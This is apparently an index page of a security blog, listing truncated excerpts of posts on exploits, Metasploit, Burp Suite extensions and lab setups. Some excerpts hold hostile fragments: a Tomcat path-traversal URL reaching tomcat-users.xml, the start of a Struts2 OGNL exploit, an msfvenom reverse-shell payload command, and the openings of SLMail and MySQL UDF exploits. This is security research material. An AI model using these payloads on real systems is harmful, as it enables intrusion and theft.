
Nixawk

Get More About Security.

  • Blog (341)
  • Resources (1)
  • Favorites
  • Following

Original Pentesters Group

References: https://github.com/nixawk/pentest-wiki/

2016-12-29 20:55:53 722

Original Security Lab

The following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of o

2014-08-10 22:40:16 2497

Repost Exploit - Apache Tomcat Directory/Path Traversal

http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users

Previous URL would copy file na

2017-04-06 18:20:06 2328

Original Exploit - RFID

RFID Hacking: Prepare; Install Proxmark3; Check Proxmark3 / card status; Crack Keys; PRNG Attack; NESTED Attack; Dump data & Write data

Prepare

Install Proxmark3

    $ sudo apt-get install git build-essential libread

2017-04-01 13:24:32 2061

Original Python - decode ip header

    #!/usr/bin/python
    # -*- coding: utf-8 -*-

    from ctypes import *
    import socket
    import struct

    class IP(Structure):
        _fields_ = [
            ("ihl", c_uint8, 4),
            ("version", c_uint8, 4),
            ("to

2017-03-30 11:51:07 1641

Original Python - NTP

In order to learn the NTP protocol and protect an NTP server against NTP DDoS attacks, we need a vulnerable NTP server.

Install a vulnerable NTP Server - NTP 4.2.6

    #!/bin/bash
    wget -c https://www.eecis.udel.edu/~nt

2017-03-28 12:41:50 1616

Original Exploit - mysql unsha1

mysql-unsha1

Authenticate against a MySQL server without knowing the cleartext password.

Abstract

This PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with

2017-03-27 11:45:47 1330

Original exploit - dahua camera backdoor

Just for security assessment. If you can exploit the Dahua camera devices, username/password/cookies can be used to access camera video.

Exploit Code

I’ll share it later.

    $ python exploit_dahua.py 192.168

2017-03-17 17:13:15 11056

Original Python - rpcinfo

In order to scan all RPC hosts in the LAN and save them into the database, we need to create a script.

    $ rpcinfo -p 10.94.106.24
    program vers proto port
    100000 4 tcp 111 rpcbind
    100

2017-03-15 13:30:03 1257

Original Compile zmap in Mac OSX

The quickest way to install zmap on Mac OS X is:

    $ brew install zmap

But it may sometimes fail, e.g.:

    $ time zmap -o icmpscan.csv --probe-module icmp_echoscan --whitelist-file=wh.txt
    Mar 09 12:23:26.57

2017-03-09 13:34:42 1024

Original exploit - CVE-2017-5638 - Apache Struts2 S2-045

Metasploit-Framework

Exp Code

    #!/usr/bin/python
    # -*- coding: utf-8 -*-

    import urllib2
    import httplib

    def exploit(url, cmd):
        payload = "%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlCo

2017-03-07 17:13:45 5665 1

Original python - weixin bot

If you are a newbie, please just run it. If you are a developer, please use it as a module.

    python
    >>> import webwxbot
    >>> dir(webwxbot)
    >>> wx = webwxbot.WEIXINBOT()
    >>> dir(wx)
    ['__class__', '__delatt

2017-03-02 19:20:57 1072

Repost Burpsuite - Extension: SQLipy

References:

https://github.com/codewatchorg/sqlipy/blob/master/SQLiPy.py

https://www.codewatch.org/blog/?p=402

2017-01-03 18:24:38 1320

Original Burpsuite - Extension: Import Links into Sitemap

How to import links into the Sitemap?

Please select “Import Links from a file” in the right menu.

Note: If the links file is too large, it may cost too much!

Code

    from burp import IBurpExtender
    from burp im

2017-01-03 15:30:41 1010

Original Burpsuite - Extension: Bulk Requests

Site Map Fetcher: this extension fetches the responses of unrequested items in the site map. When browsing a target, Burp adds to the site map any items that are inferred from actual responses. Some of

2017-01-03 11:22:27 726

Original Burpsuite - Extension: Get All Proxied Hosts

How to get all proxied hosts from the Burp Suite sitemap?

    from burp import IBurpExtender
    from burp import IContextMenuFactory
    from javax.swing import JMenuItem
    from java.util import List, ArrayList
    from java

2017-01-01 19:43:45 493

Original Docker - Cannot connect to the Docker daemon

Start docker, and pull bkimminich/juice-shop. The console says:

    $ docker pull bkimminich/juice-shop
    Using default tag: latest
    Warning: failed to get default registry endpoint from daemon (Cannot connect to t

2016-12-27 18:21:33 4506

Original Router - Netgear Remote Command Injection

Description

NETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit

2016-12-15 14:33:27 655

Original Android - Application Reversing

How to pwn cocon.apk?

This is a CTF Android apk called cocon.apk, and we need to decrypt the hash value (CTF flag). Please prepare a smartphone and install the apk file. If successful, the Android desktop will sho

2016-12-13 14:29:47 838

Original Metasploit - ERROR: cannot discover where libxml2 is located on your system

    metasploit-framework [rapid7-master] ->> rvm list
    rvm rubies

    =* ruby-2.3.3 [ x86_64 ]

    # => - current
    # =* - current && default
    # * - default

When Ruby is updated from ruby-2.3.1 to ruby-2.3.3, it will ma

2016-12-07 13:57:47 1598

Original Metasploit - spawn a cmd shell into meterpreter

Generate a VBS payload with Metasploit

    ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform win
    No encoder or badchars specified, outpu

2016-11-01 18:45:16 1451

Original Pentest - mysql udf privilege escalation

How to compile UDF DLL

    #include <stdio.h>
    #include <stdlib.h>

    enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

    typedef struct st_udf_args {
        unsigned int arg_count; // num

2016-10-31 22:46:53 1087

Original Python - rq / mrq / Celery

rq

Simple job queues for Python http://python-rq.org

Please read the results from the Redis server.

mrq

Mr. Queue - A distributed worker task queue in Python using Redis & gevent - https://github.com/pricingas

2016-10-26 14:01:17 1850

Original Metasploit - auxiliary/gather/censys_search

    msf > use auxiliary/gather/censys_search
    msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
    msf > set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    msf > set CENSYS_DORK rapid7

Certificates Sea

2016-10-25 12:04:10 1139

Original Metasploit - auxiliary/gather/zoomeye_search

How to use the ZoomEye API?

If you are a Python developer, please view ZoomEye-SDK. If not, the ZoomEye API Documentation is good for you.

    $ sudo easy_install zoomeye-SDK

or

    $ sudo pip install git+https://github.

2016-10-19 01:08:53 521976

Repost PowerShell - PowerShell’s Security Guiding Principles

    PS C:\Users\test\Desktop\PowerSploit-master\Exfiltration> Set-ExecutionPolicy Default
    Execution Policy Change
    The execution policy helps protect you from scripts that you do not trust. Changing the exec

2016-10-15 22:03:47 762

Repost Pentest - PowerShell and Token Impersonation

This post will discuss bringing incognito-like functionality to PowerShell in the form of a new PowerShell script (Invoke-TokenManipulation), with some important differences. I’ll split this post up in

2016-10-15 17:58:34 840

Original Metasploit - enum_linux

enum_linux.rc

    run post/linux/gather/enum_configs
    run post/linux/gather/enum_protections
    run post/linux/gather/enum_system
    run post/linux/gather/enum_xchat
    run post/linux/gather/enum_network
    run post/lin

2016-10-14 13:45:00 565

Original Python - WIFI Scan

How to find weak wireless APs with SSID:BSSID?

    #!/usr/bin/python
    # -*- coding: utf8 -*-

    from access_points import get_scanner

    def parse_apinfo(ap):
        return (ap['quality'], ap['ssid'], ap['bssid'])

    d

2016-10-09 10:27:42 4434 1

Original Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure

Summary

A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret

2016-09-29 21:26:54 1479

Original Vuln - Cisco - CVE-2016-6366

https://github.com/RiskSense-Ops/CVE-2016-6366/

Exploit Cisco CVE-2016-6366

    msf auxiliary(snmp_login) > set PASSWORD public
    PASSWORD => public
    msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
    RHOST

2016-09-26 16:46:57 2969

Repost Linux - How to check processor and cpu details

Processor/CPU details

The details about the processor that we shall be talking about include, number of cores, availability of hyper threading, architecture, cache size etc. To find these details about

2016-09-20 11:17:59 1280

Original vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit

Deploy a vuln lab

Please install docker yourself.

    #!/bin/bash
    docker build -t sugarcrm:CVE-2016-7124 -f Dockerfile .
    docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124

Dockerfile

    # docker php tag list

2016-09-15 00:07:05 1290

Repost How to scan whole Internet 3.7 billion IP addresses in few minutes?

Cyber security audit and ethical hacking training professionals normally use scanners to scan networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour

2016-09-12 18:13:49 596

Original Linux - mipsel/mips/arm/armeb - gdb compile

If you don’t know what buildroot is, please refer to https://www.uclibc.org/

How to install buildroot

    root@lab:~# uname -a
    Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 G

2016-08-22 17:24:32 3601

Original Linux - mysql sql injection

    select user from user where user='ro' 'ot'=0;

When user is root, it should query as follows:

    1. select user from user where user='ro' 'ot'=0;
    2. select user from user where 'root'='ro' 'ot'=0;
    3. select

2016-08-19 18:10:05 580

Original Pentest - routersploit

    $ git clone https://github.com/reverse-shell/routersploit
    $ sudo pip install -r requirements.txt
    $ python2 rsf.py
    ______ _ _____ _ _ _ | ___ \ | |

2016-08-16 23:21:31 2638

Original Linux - setup a tftp server

tftp server

    root@kali:~# atftpd
    Usage: tftpd [options] [directory]
    [options] may be:
    -t, --tftpd-timeout <value>: number of second of inactivity before exiting
    -r, --retry-timeout <value>: time to

2016-08-10 12:02:28 720

Original Linux - rpcclient

Demo

    root@kali:~/reports# rpcclient -U "" 10.11.1.227
    Enter 's password:
    rpcclient $> help
    --------------- ----------------------
    CLUSAPI
    clusapi_open_cluster bla
    clusapi_ge

2016-08-06 13:37:55 2746 1

Original exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit

https://www.exploit-db.com/exploits/638/

    #!/usr/bin/python
    # -*- encoding: utf-8 -*-

    import sys
    import socket
    import struct

    #
    # OS Name: Microsoft Windows XP Professional
    # OS Version:

2016-07-26 22:30:52 3268
